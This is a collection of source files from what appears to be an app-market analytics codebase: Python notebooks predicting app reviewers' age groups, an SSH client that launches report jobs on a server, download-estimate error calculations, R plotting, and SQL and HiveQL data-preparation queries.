with open('%s/%s_classifier.pkl'%(DATA_DIR, MODEL_NAME), 'rb') as fid:
clf = cPickle.load(fid)
#df_train = df_train[df_train['app_id'].isin(test_ids)]
print len(train_words)
#print len(np.where(np.abs(clf.coef_)>1)[0])
print clf
# In[35]:
df_obs = pd.read_csv('%s/%s'%(DATA_DIR, TEST_FILE), error_bad_lines=False)
df_obs.columns = ['app_id', 'date', 'title', 'text', 'reviewer']
#df_obs = df_obs[df_obs['app_id'].isin(test_ids)]
#df_obs['text'] = df_obs.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
#del df_obs['title']
#df_obs = apply_parallel(df_obs, JOBS, 'lang', 'text', guess_lang)
#df_obs = df_obs[df_obs['lang'] == 'en']
#del df_obs['lang']
#df_app_id_reviewer = df_obs[['app_id', 'reviewer']].drop_duplicates()
#print df_app_id_reviewer.shape
#df_obs = apply_parallel(df_obs, JOBS, 'text', 'text', features, [sw, pattern, control, 1, 3])
#df_obs['text'] = df_obs['text'].apply(lambda x: features(x, sw, pattern, control, 1, 2))
#df_obs.rename(columns={'text':'tokens'}, inplace=True)
print df_obs.columns
print df_obs.shape
df_obs = df_obs.groupby('app_id')
# In[ ]:
#df_obs = apply_parallel(df_obs, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
#print 'generate_vector done'
#df_obs = predict_parallel(df_obs, JOBS, 'vectors', 'age_group', clf)
#df_obs['predicted_age'] = clf.predict(list(df_obs['vectors'])
done_files = os.listdir('%s/predictions'%DATA_DIR)
def predict(n, g, filename, files_done):
new_file = 'pred_%s_%s'%(n, filename)
if new_file in files_done:
return
g['text'] = g.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
g['lang'] = g['text'].apply(guess_lang)
g = g[g['lang'] == 'en']
g['text'] = g['text'].apply(lambda x: features(x, sw, pattern, control, 1, 3))
g['vectors'] = g['text'].apply(lambda x: generate_vector(x, train_words))
try:
g['age_group'] = clf.predict(list(g['vectors']))
except Exception,e:
print e
print g
return
g[['date', 'app_id', 'age_group']].to_csv('%s/predictions/%s'%(DATA_DIR, new_file), index=False)
files = ['ios_reviews_143441_201301.csv', 'ios_reviews_143441_201303.csv',
'ios_reviews_143441_201305.csv', 'ios_reviews_143441_201307.csv',
'ios_reviews_143441_201309.csv', 'ios_reviews_143441_201311.csv',
'ios_reviews_143441_201401.csv', 'ios_reviews_143441_201302.csv',
'ios_reviews_143441_201304.csv', 'ios_reviews_143441_201306.csv',
'ios_reviews_143441_201308.csv', 'ios_reviews_143441_201310.csv',
'ios_reviews_143441_201312.csv', 'ios_reviews_143441_201402.csv']
def producer():
for n,g in df_obs:
yield n, g.copy()
for filename in files:
D = delayed(predict)
a = [D(i[0], i[1], filename, done_files)
for i in producer()]
Parallel(n_jobs=JOBS)(a)
# In[ ]:
df_obs2 = df_obs[['app_id', 'age_group']]
# In[ ]:
df_obs2.to_csv('%s/pred_%s'%(DATA_DIR, TEST_FILE), index=False)
# In[ ]:
benchmark_df = df_train[['age']]
benchmark_df['age_group'] = benchmark_df['age']
benchmark_df = benchmark_df[['age_group']]
benchmark_df = benchmark_df.groupby('age_group').size().reset_index()
benchmark_df['%a'] = (benchmark_df[0]/(benchmark_df[0].sum() * 1.0))*100
benchmark_df['%a'] = benchmark_df['%a'].apply(lambda x: round(x, 1))
# In[ ]:
benchmark_df
# In[ ]:
def get_app_dist(df, benchmark_df, app_id):
benchmark_df = benchmark_df[benchmark_df['app_id']==app_id]
benchmark_df['age_group'] = benchmark_df['age']
benchmark_df = benchmark_df[['age_group']]
benchmark_df = benchmark_df.groupby('age_group').size().reset_index()
benchmark_df['%a'] = (benchmark_df[0]/(benchmark_df[0].sum() * 1.0))*100
benchmark_df['%a'] = benchmark_df['%a'].apply(lambda x: round(x, 1))
res = df[df['app_id']==app_id].groupby(['age_group']).size().reset_index()
res['%'] = (res[0]/res[0].sum())*100
res = res.merge(benchmark_df, on='age_group', how='left')
fig, ax = plt.subplots()
ind = np.arange(len(res))
width = 0.35
rects1 = ax.bar(ind, res['%'], width, color='b')
rects2 = ax.bar(ind+width, res['%a'], width, color='r')
#ax.bar(ind+width, res['%'])
#ax.bar(ind+width, benchmark_df['%a'])
plt.axis([0, len(res), 0, 100])
ax.set_xticks(ind+(2*width))
ax.set_xticklabels(res['age_group'], rotation='vertical')
ax.legend((rects1[0], rects2[0]), ('Prediction', 'Training') )
plt.grid(True)
plt.xlabel('Age Range')
plt.ylabel('User Percentage')
#plt.plot(ind, res['age_group'], 'o')
print res
plt.show()
#return res
# In[ ]:
def show_app_diff(df, benchmark_df, app_id):
res = df[df['app_id']==app_id]
res2 = res.groupby('age_group').size().reset_index()
res2['%'] = (res2[0]/(res2[0].sum() * 1.0))*100
res2['%'] = res2['%'].apply(lambda x: round(x, 1))
#print benchmark_df.columns
res2 = res2.merge(benchmark_df, on = ['age_group'], how = 'left')
#res2['%diff'] = res2['%'] / res2['%a'] - 1.0
res2['%diff'] = res2['%'] - res2['%a']
fig, ax = plt.subplots()
ind = np.arange(len(res2))
#print ind
width = 0.35
colors = []
for value in res2['%diff']: # keys are the names of the boys
if value > 0:
colors.append('g')
else:
colors.append('r')
ax.bar(ind+width, res2['%diff'], color = colors)
ax.set_xticks(ind+(2*width))
ax.set_xticklabels((ind+1))
#plt.plot(ind, res['age_group'], 'o')
plt.axis([0, len(res2), -50, 50])
plt.grid(True)
plt.xlabel('Age Range')
plt.ylabel('User Percentage - Benchmark Percentage')
#plt.title('Histogram of User Age')
# In[ ]:
get_app_dist(df_obs2, df_train, 284882215) #Facebook
show_app_diff(df_obs2, benchmark_df, 284882215)
# In[ ]:
get_app_dist(df_obs2, df_train, 447188370) #Snapchat
show_app_diff(df_obs2, benchmark_df, 447188370)
# In[ ]:
get_app_dist(df_obs2, df_train, 529479190) #Clash of Clans
show_app_diff(df_obs2, benchmark_df, 529479190)
# In[ ]:
get_app_dist(df_obs2, df_train, 553834731) #Candy Crush
show_app_diff(df_obs2, benchmark_df, 553834731)
# In[ ]:
get_app_dist(df_obs2, df_train, 333903271) #Twitter
show_app_diff(df_obs2, benchmark_df, 333903271)
# In[ ]:
get_app_dist(df_obs2, df_train, 284862083) #NY times
show_app_diff(df_obs2, benchmark_df, 284862083)
# In[ ]:
get_app_dist(df_obs2, df_train, 578463146) #Egg baby
show_app_diff(df_obs2, benchmark_df, 578463146)
# In[ ]:
get_app_dist(df_obs2, df_train, 538212549) #Big fish casino
show_app_diff(df_obs2, benchmark_df, 538212549)
# In[ ]:
get_app_dist(df_obs2, df_train, 725008683) #Turbo tax
show_app_diff(df_obs2, benchmark_df, 725008683)
# In[ ]:
# In[ ]:
<file_sep>/tooling/DistimoClients/distimo_clients/moneymaker.py
import configparser
import inspect
import os
import paramiko
from time import gmtime, strftime
class Client:
def __init__(self, host="", user="", password="", port=""):
"""
Loads MoneyMaker settings and creates connection. File settings.ini or
clients/settings.ini is read if no parameters are given.
"""
        if host is None or host == "":
# Parse settings.ini
config = configparser.ConfigParser()
config.read('settings.ini')
if "MoneyMaker" not in config.keys():
path_to_class = os.path.dirname(inspect.getfile(self.__class__))
settings_path = (path_to_class + os.sep + 'settings.ini')
config.read(settings_path)
try:
self.host = config['MoneyMaker']['host']
self.user = config['MoneyMaker']['user']
self.password = config['MoneyMaker']['password']
self.port = config['MoneyMaker']['port']
except KeyError:
print('Error loading settings.ini file(s).')
raise
else:
# Unpack arguments.
self.host = host
self.user = user
            self.password = password
self.port = port
self.client = None
self.create_client()
def create_client(self):
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.client.connect(self.host, username=self.user,
password=self.password, port=int(self.port))
return self.client
def close_client(self):
self.client.close()
def execute_job(self, client_query_file, report, client='', metric_tree='',
detach_job=True, time_till_job_start=0, time_between_jobs=0,
simultaneous_jobs=1):
"""
Executes a job on report1.
Params:
        - client_query_file: Path to a query file. If a list with
          paths to query files is supplied, each query file is evaluated in
          a different moneymaker session.
        - report: Report to run
        - client: Client (optional)
        - metric_tree: Path to algorithm.
        - detach_job: Flag to run detached.
        - time_till_job_start: Delay in seconds before the first job starts.
        - time_between_jobs: Time to wait before the next job is run in
          seconds (can be used to avoid lock time-out problems).
        - simultaneous_jobs: Number of jobs queued per sleep interval (the
          delay counter only advances after this many jobs).
        """
job_name = (strftime("%Y%m%d%H%M%S", gmtime()) + "_" +
(client + "_" if client else '') + report)
svn_up_command = 'cd /home/%s/moneymaker/ && svn update' % self.user
launch_command = 'cd /home/%s/moneymaker/ &&' % self.user
if detach_job:
launch_command += ' screen -AmdS ' + job_name
launch_command += " bash -c 'sleep {} && ./moneymaker.php"
if client:
launch_command += ' -c ' + client
if metric_tree:
launch_command += ' -v mt:' + metric_tree
launch_command += ' ' + report
if isinstance(client_query_file, str):
client_query_file = [client_query_file]
money_maker_commands = []
for i_file, current_query in enumerate(client_query_file):
sleep_time = time_till_job_start + (i_file/simultaneous_jobs) * time_between_jobs # counter will increase by 1 after # simultaneous_jobs are queued
job_command = (launch_command.format(sleep_time) + ' -v cqf:' +
current_query + "'")
money_maker_commands.append(job_command)
commands = [svn_up_command] + money_maker_commands
self.execute_command(commands)
def execute_command(self, command):
        if isinstance(command, str):
# Command is string
            print('%s@%s: %s' % (self.user, self.host, command))
stdin, stdout, stderr = self.client.exec_command(command)
for line in stdout.read().splitlines():
print('%s' % line)
else:
# Command is list of strings
for command_entry in command:
                print('%s@%s: %s' % (self.user, self.host, command_entry))
stdin, stdout, stderr = self.client.exec_command(command_entry)
for line in stdout.read().splitlines():
print('%s' % line)
def show_jobs(self):
command = 'screen -ls'
self.execute_command(command)
def kill_job(self, job_name):
        if isinstance(job_name, str):
command = 'screen -S %s -X quit' % job_name
self.execute_command(command)
else:
for job_name_entry in job_name:
command = 'screen -S %s -X quit' % job_name_entry
self.execute_command(command)
def kill_all_detached_jobs(self):
"""
Kills all detached jobs.
"""
command = ("screen -ls | grep Detached | cut -d. -f1 | " +
"awk '{print $1}' | xargs kill")
self.execute_command(command)<file_sep>/old_investigations/android/internal/calculate_sda.py
import os.path
import pandas as pd
import numpy as np
CATEGORY_ID_OVERALL = 1
CATEGORY_ID_GAMES = 2
def calculate_sda_and_save(f_downloads, f_usd, f_reference):
"""Calculate SDA and save the results.
Arguments:
- `f_downloads`: Related downloads data.
- `f_usd`: Related USD data.
- `f_reference`: Reference file, containing the apps that we care.
"""
if f_reference:
# Extract the App ID that we care, it will save a lot of time.
df_reference = pd.read_csv(f_reference)
df_reference = aggregate_reference(df_reference)
app_ids = pd.Series.unique(df_reference['App ID'])
else:
app_ids = None
daterange_agg = aggregate_downloads_and_usd_and_save_daily(f_downloads, f_usd, app_ids)
meta_info = _extract_meta_info_in_filename(f_downloads)
if f_reference:
# Merge with reference file.
merged = pd.merge(df_reference, daterange_agg, how='left', on=['App ID', 'Unit'])
# Adjust the sequence of columns.
merged = merged.reindex(columns=['App ID', 'Market', 'Country', 'Month', 'Version', 'App Name',
'Publisher ID', 'Publisher Name', 'estimate_dailybest',
'estimate_dailyworst', 'estimate_overall',
'estimate_avg', 'App Estimate', 'units_avg', 'Unit',
'both_real_estimate_num'])
merged.rename(columns={'App Estimate': 'Current Best Estimation'}, inplace=True)
merged.to_csv("sda/SDA_%(country)s_%(daterange)s_With_Reference_Aggregated.csv" % meta_info,
index=False)
else:
daterange_agg.to_csv("sda/SDA_%(country)s_%(daterange)s_Aggregated.csv" % meta_info,
index=False)
def aggregate_reference(df):
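    # Sum 'App Estimate' per (App ID, Unit), then re-attach a single metadata
    # row (country, month, app name, publisher, ...) per group via head(1).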
grouped = df.groupby(['App ID', 'Unit'])
agg = grouped.aggregate({'App Estimate': np.nansum})
agg = agg.reset_index()
df_drop = df[['App ID', 'Country', 'Month', 'Version', 'App Name',
'Publisher ID', 'Publisher Name', 'Unit']]
merged = pd.merge(agg, df_drop, on=['App ID', 'Unit'], how='left')
merged = merged.groupby(['App ID', 'Unit']).apply(lambda x: x.head(1).drop(['App ID', 'Unit'],
axis=1))
merged = merged.reset_index(level=[0, 1])
merged['Market'] = 'all'
return merged
def aggregate_downloads_and_usd_and_save_daily(f_downloads, f_usd, app_ids):
meta_info = _extract_meta_info_in_filename(f_downloads)
df_downloads = pd.read_csv(f_downloads)
    if app_ids is not None:
df_downloads = df_downloads.ix[df_downloads['app_id'].isin(app_ids)]
agg_downloads = _aggregate_df(df_downloads)
agg_downloads['Unit'] = 'Downloads'
df_usd = pd.read_csv(f_usd)
    if app_ids is not None:
df_usd = df_usd.ix[df_usd['app_id'].isin(app_ids)]
agg_usd = _aggregate_df(df_usd)
agg_usd['Unit'] = 'USD'
# Combine Downloads and USD data.
agg = pd.concat((agg_downloads, agg_usd), axis=0)
agg.rename(columns={'app_id': 'App ID'}, inplace=True)
# This is the columns that we need.
agg = agg[['App ID', 'date', 'estimate_dailybest', 'estimate_dailyworst', 'estimate_avg',
'estimate_overall', 'estimate_games', 'units_avg', 'Unit']]
agg = agg.sort_index(by=['App ID', 'Unit', 'date'], ascending=False)
agg.to_csv("sda/SDA_%(country)s_%(daterange)s_Daily.csv" % meta_info, index=False)
# Go whole range aggregation.
# date is irrelevant now.
agg = agg.drop('date', axis=1)
agg['both_real_estimate_num'] = 1
daterange_agg = agg.groupby(['Unit', 'App ID']).aggregate(pd.Series.sum).reset_index()
return daterange_agg
def _extract_meta_info_in_filename(f):
"""For extracting meta info in filename.
The filename is supposed to be {country}_{startdate}--{enddate}_{Downloads|USD}.csv
"""
basename = os.path.basename(f)
basename_split = basename.split('_')
daterange = basename_split[1]
return {'country': basename_split[0], 'daterange': daterange}
def _aggregate_df(df):
print("Aggregating different feeds...")
grouped = df.groupby(['app_id', 'date', 'category_id'])
agg = grouped.aggregate({'estimate': np.nansum, 'units': pd.Series.mean})
print("Calculate daily estimate sda...")
return _calculate_daily_estimate_sda(agg.reset_index())
def _calculate_daily_estimate_sda(df):
# Only these columns are relevant.
df['error'] = (df['estimate'] - df['units']).abs()
grouped = df.groupby(['date', 'app_id'])
def pick_extreme_with_op(group, argop):
i = group.index[argop(group['error'])]
return group.ix[i][['estimate', 'units']]
print('Calculating worst.')
worst = grouped.apply(lambda x: pick_extreme_with_op(x, np.nanargmax))
worst.rename(columns={'estimate': 'estimate_dailyworst'}, inplace=True)
# We only need to keep one unit (units_avg)
worst = worst.drop('units', axis=1)
print('Calculating best.')
best = grouped.apply(lambda x: pick_extreme_with_op(x, np.nanargmin))
best.rename(columns={'estimate': 'estimate_dailybest'}, inplace=True)
best = best.drop('units', axis=1)
def use_overall(x):
v = x.ix[x['category_id'] == CATEGORY_ID_OVERALL]
if len(v) == 0:
return pd.Series([np.nan], index=['estimate'])
else:
return pd.Series([np.nansum(v['estimate'])], index=['estimate'])
def use_games(x):
v = x.ix[x['category_id'] == CATEGORY_ID_GAMES]
if len(v) == 0:
return pd.Series([np.nan], index=['estimate'])
else:
return pd.Series([np.nansum(v['estimate'])], index=['estimate'])
    print('Calculating Overall.')
overall = grouped.apply(use_overall)
overall.rename(columns={'estimate': 'estimate_overall'}, inplace=True)
    print('Calculating Games.')
games = grouped.apply(use_games)
games.rename(columns={'estimate': 'estimate_games'}, inplace=True)
print('Calculating avg.')
avg = grouped.aggregate({'estimate': pd.Series.mean, 'units': pd.Series.mean})
avg.rename(columns={'estimate': 'estimate_avg', 'units': 'units_avg'}, inplace=True)
return best.join(avg).join(worst).join(overall).join(games).reset_index().sort_index(by=['date', 'units_avg'],
ascending=False)
<file_sep>/old_investigations/plot_dist_daily_vs_overall.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Overall
sub_df= subset(df, !is.na(estimate_overall))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
# The default winner is SDA.
current_df$winner = "SDA"
# Where SDA loses.
sel = (abs(current_df$estimate_avg - current_df$units_avg) > abs(current_df$estimate_overall- current_df$units_avg))
current_df$winner[sel] = 'estimate_overall'
## This has to be put last!
## Use this if you want to separate '< 5% difference' out
## sel = abs(((abs(current_df$estimate_avg - current_df$units_avg) / current_df$units_avg) - (abs(current_df$estimate_overall - current_df$units_avg) / current_df$units_avg))) < 0.05
## current_df$winner[sel] = '< 5% difference'
## Compress outliers.
m = mean(current_df$units_avg)
s = sd(current_df$units_avg)
current_df$units_avg[current_df$units_avg > (m + 2 * s)] = m + 2 * s
stacked_df = rbind(stacked_df, current_df)
}
plot <- plot_dist(stacked_df, metainfo)
ggsave(plot, file=paste('plots/',
paste(metainfo$country, metainfo$period, 'dist_daily_vs_overall.png', sep='_'), sep=''),
width=10, height=5)
<file_sep>/audience/legacy_experiments/model_ipv2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: model for review demographic
#
#
##
from nltk.corpus import wordnet
from nltk.corpus import words
from collections import defaultdict
import pandas as pd
import os
import nltk
import numpy as np
from unidecode import unidecode
def main():
df_obs = pd.read_csv('/Users/antony/workspace/out.csv', error_bad_lines=False)
df_benchmark = pd.read_csv('/Users/antony/workspace/data/demie/benchmark_name.csv')
clean_name_set = set(df_benchmark['clean_name'].dropna())
remove_set = set(['in', 'my', 'fan', 'king', 'art', 'man', 'love', 'guy', 'rose', 'soon', 'cookie', 'mac', 'jc', 'happy',
'case', 'bear', 'sun', 'don', 'pa', 'queen', 'delta', 'ma', 'le', 'em', 'star', 'er'])
for i in clean_name_set:
if len(i) < 4:
remove_set.add(i)
for i in clean_name_set:
if wordnet.synsets(i):
remove_set.add(i)
for i in remove_set:
clean_name_set.discard(i)
df_obs = df_obs[0:10000]
df_obs.rename(columns={' reviewer ':'reviewer'}, inplace=True)
df_obs['reviewer'] = df_obs['reviewer'].astype(str)
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: x.strip())
    df_obs = df_obs.dropna()
    df_obs = df_obs.drop_duplicates()
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: unidecode(x.decode('utf-8', "replace")))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
df_obs['token'] = df_obs['reviewer'].apply(lambda x: nltk.regexp_tokenize(x, pattern2))
for i in range(len(df_obs['token'])):
#df_obs['token_l'][i] = set()
df_obs['token'][i] = [element.lower() for element in df_obs['token'][i]]
df_obs['token'] = df_obs['token'].apply(lambda x: set(x))
df_obs['token'] = df_obs['token'].apply(lambda x: x.intersection(clean_name_set))
df_obs.values
print '======== Done'
pass
if __name__ == '__main__':
main()<file_sep>/int-vs-m-benchmark/sql/ios/1000b1-prepare_transactional_data-collect_data.sql
/*
DESCRIPTION : collect daily transactional data for selected dates
INPUT TABLE(S) : appstore.downloads, appstore.appstore_instances, appstore.applications
temp.settings_day_weights, temp.settings_excluded_apps, temp.settings_appstore_instances
temp.settings_exchange_rates
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.one_off_and_iap
QUERY STEPS : 1. select dates to use for estimation
2. collect all transactional data, both one off and iap, for selected dates
*/
-- SELECTED TRANSACTIONAL DATES --
SELECT DATE(MIN(date)) FROM temp.settings_day_weights INTO @first_day_transactional;
-- collect all transactional data from appstore.downloads, both one off and iap at once
DROP TEMPORARY TABLE IF EXISTS temp.download_data_per_app;
CREATE TEMPORARY TABLE temp.download_data_per_app(
`date` date NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`application_id` int(10) unsigned NOT NULL,
`transaction_type` ENUM('free','paid') NOT NULL COLLATE 'utf8_unicode_ci',
`parent_id` int(10) unsigned NOT NULL,
`price_usd` DECIMAL(15,8) NOT NULL,
`expected_value` INT(11) NOT NULL,
`value` INT(11) NOT NULL,
iphone_app tinyint(1) DEFAULT NULL,
ipad_app tinyint(1) DEFAULT NULL,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date, country_id, application_id, transaction_type)
)
AS
SELECT
d.date,
sai.country_id,
d.application_id,
IF(d.customer_price = 0, 'free', 'paid') as transaction_type,
IFNULL(a.parent_id,a.id) as parent_id,
ROUND(SUM(d.value*(d.customer_price/ser.rate))/SUM(d.value),8) as price_usd, -- weighted price in case of price_change !
SUM(d.value) as expected_value,
SUM(IF(d.type in ('download_educational','gift_purchase'),0,d.value)) as value,
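    -- Device-availability flags: an app counts as iPhone/iPad-capable based on
    -- the store instances (sai.device_id) it shows up in; they are only derived
    -- when the period starts on or after 2013-11-14 (the @first_day_transactional check).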
IF(DATE(@first_day_transactional) >= 20131114, MAX(IF(a.parent_id IS NOT NULL, NULL, IF(sai.device_id = 2, 0, 1))), NULL) AS iphone_app,
IF(DATE(@first_day_transactional) >= 20131114, MAX(IF(a.parent_id IS NOT NULL, NULL, IF(sai.device_id = 1, 0, 1))), NULL) AS ipad_app,
w.weight
FROM
appstore.downloads d
STRAIGHT_JOIN appstore.applications a ON a.id = d.application_id
JOIN temp.settings_day_weights w ON w.date = d.date
JOIN temp.settings_appstore_instances sai ON sai.appstore_instance_id = d.appstore_instance_id
LEFT JOIN temp.settings_excluded_apps sea ON sea.application_id=d.application_id
LEFT JOIN temp.settings_exchange_rates ser ON ser.id = d.customer_currency_id
WHERE
d.value > 0
AND sea.application_id IS NULL
    -- still need to decide on the final set of types
    -- but if we use fewer types, the consistency check no longer works either...
    -- then maybe: one column (value) for checking and one value column for the data you
    -- actually use, i.e. something like SUM(IF(d.type IN ('download','subscription','subscription_renewal'), d.value, null)) AS value_to_use
AND d.type IN ('download','download_educational','gift_purchase','subscription','subscription_renewal')
GROUP BY date, country_id, application_id, d.customer_price = 0
;
SELECT COUNT(DISTINCT date) FROM temp.settings_day_weights WHERE weight > 0 INTO @transactional_days;
-- create weighted averaged transactional data from appstore.downloads table
-- at the same time, check if the total values from appstore.downloads match with appstore.downloads_meta_data
DROP TEMPORARY TABLE IF EXISTS temp.download_data_per_parent_app;
CREATE TEMPORARY TABLE temp.download_data_per_parent_app(
`date` date NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`application_id` int(10) unsigned NOT NULL,
`type` ENUM('gross','free','paid') NOT NULL,
`value` decimal(8,2),
`value_split` decimal(8,2),
`usable_split_data` tinyint(1) DEFAULT NULL,
iphone_app tinyint(1) DEFAULT NULL,
ipad_app tinyint(1) DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, country_id, type, application_id)
)
SELECT
date,
country_id,
parent_id AS application_id,
t.type,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue
WHEN t.type = 'paid' THEN x.paid_downloads
WHEN t.type = 'free' THEN x.free_downloads
END
,2) AS value,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue_split
WHEN t.type = 'paid' THEN x.paid_downloads_split
WHEN t.type = 'free' THEN x.free_downloads_split
END
,2) AS value_split,
IF(
CASE
WHEN t.type = 'gross' THEN x.revenue_split/x.expected_revenue
WHEN t.type = 'paid' THEN x.paid_downloads_split/x.expected_paid_downloads
WHEN t.type = 'free' THEN x.free_downloads_split/x.expected_free_downloads
END - 1 BETWEEN -0.03 AND 0.03, 1, 0
) AS usable_split_data,
iphone_app,
ipad_app
FROM (
SELECT
date,
country_id,
parent_id,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.collected_split_value, null)) as free_downloads_split,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.expected_value, null)) as expected_free_downloads,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.value, null)) as free_downloads,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.collected_split_value, null)) as paid_downloads_split,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.expected_value, null)) as expected_paid_downloads,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.value, null)) as paid_downloads,
SUM(d.weight*d.collected_split_value*d.price_usd) AS revenue_split,
SUM(d.weight*d.expected_value*d.price_usd) AS expected_revenue,
SUM(d.weight*d.value*d.price_usd) AS revenue,
MAX(iphone_app) AS iphone_app,
MAX(ipad_app) AS ipad_app
FROM (
SELECT
d.date,
d.country_id,
d.parent_id,
d.transaction_type,
d.application_id,
d.value,
d.expected_value,
sum(m.value) as collected_split_value,
-- so you can calculate missing total revenue later
d.price_usd,
d.weight,
d.iphone_app,
d.ipad_app
FROM
temp.download_data_per_app d
LEFT JOIN appstore.downloads_meta_data m
USING (date, country_id, application_id, transaction_type)
-- filter out free inapps; we do not use them
WHERE NOT (d.transaction_type = 'free' AND d.parent_id <> d.application_id)
GROUP BY date,country_id,application_id,transaction_type
) d
GROUP BY date, country_id, parent_id
) x
JOIN (SELECT 'free' AS type UNION SELECT 'paid' AS type UNION SELECT 'gross' AS type) t
HAVING value IS NOT NULL AND value > 0
;
-- collect all split transactional data
DROP TEMPORARY TABLE IF EXISTS temp.transactional_data_split;
CREATE TEMPORARY TABLE temp.transactional_data_split(
`date` date NOT NULL,
`device_id` TINYINT unsigned NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`type` ENUM('gross','free','paid') NOT NULL,
`application_id` int(10) unsigned NOT NULL,
value decimal(8,2) NOT NULL,
CONSTRAINT PRIMARY KEY (date, device_id, country_id, type, application_id)
)
SELECT
x.date,
x.device_id,
x.country_id,
t.type,
x.application_id,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue
WHEN t.type = 'paid' THEN x.paid_downloads
WHEN t.type = 'free' THEN x.free_downloads
END
,2) AS value
FROM (
SELECT
d.date,
e.device_id,
d.country_id,
d.parent_id as application_id,
SUM(
case
WHEN e.device_id = 1 AND m.platform in ('iPod','iPhone') THEN d.weight*m.value*d.price_usd
WHEN e.device_id = 2 AND m.platform in ('iPad','AppleTV') THEN d.weight*m.value*d.price_usd
ELSE NULL
end
) AS revenue,
SUM(
case
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 1
AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform in ('iPod','iPhone') THEN d.weight*m.value
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 2
AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform in ('iPad') THEN d.weight*m.value
WHEN d.ipad_app = 0 AND e.device_id = 1 AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
WHEN d.iphone_app = 0 AND e.device_id = 2 AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
ELSE NULL
end
) AS free_downloads,
SUM(
case
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 1
AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND e.device_id = 1 AND m.platform in ('iPod','iPhone') THEN d.weight*m.value
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 2
AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND e.device_id = 2 AND m.platform in ('iPad') THEN d.weight*m.value
WHEN d.ipad_app = 0 AND e.device_id = 1 AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
WHEN d.iphone_app = 0 AND e.device_id = 2 AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
ELSE NULL
end
) AS paid_downloads
FROM
temp.download_data_per_app d
JOIN appstore.downloads_meta_data m
USING (date, country_id, application_id, transaction_type)
JOIN (SELECT 1 AS device_id UNION SELECT 2 AS device_id) e
GROUP BY d.date, e.device_id, d.country_id, d.parent_id
) x
JOIN (SELECT 'free' AS type UNION SELECT 'paid' AS type UNION SELECT 'gross' AS type) t
HAVING value is NOT NULL AND value > 0
;
-- delete unusable split transactional data
DELETE temp.transactional_data_split.*
FROM temp.transactional_data_split
LEFT JOIN temp.download_data_per_parent_app u
USING(date, country_id, type, application_id)
WHERE u.application_id IS NULL
OR u.usable_split_data = 0
;
<file_sep>/aa_au_model/hiveql_scripts/get_sessions_per_device.sql
-- get the number of sessions and total length per date, device, country, bundle from app session data
-- change the date range and the S3 output folder below for your DS environment
DROP TABLE IF EXISTS app_sessions_per_device;
CREATE TABLE app_sessions_per_device
AS
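-- Note: starttime/endtime appear to be epoch milliseconds, so dividing the
-- summed session length by 1000 yields seconds (assumption based on the /1000).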
SELECT datestr, device_id, country, bundleid, COUNT(*) AS sessions, ROUND(SUM((endtime-starttime)/1000),0) AS duration
FROM vpn_sample_data_session
WHERE datestr >= '2015-01-25'
AND datestr <= '2015-01-31'
GROUP BY datestr, device_id, country, bundleid
;
DROP TABLE if exists csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`country` string,
`bundleid` string,
`sessions` bigint,
`duration` double)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
INSERT OVERWRITE TABLE csvexport
SELECT * FROM app_sessions_per_device
;
<file_sep>/int-vs-m-benchmark/sql/0-settings-android.sql
-- Version --
SET @version = 14;
-- Time settings --
SET @date=20140604;
SET @run_timestamp = CURRENT_TIMESTAMP(3);
-- Stored procedures and estimates DB
USE estimates_dev;
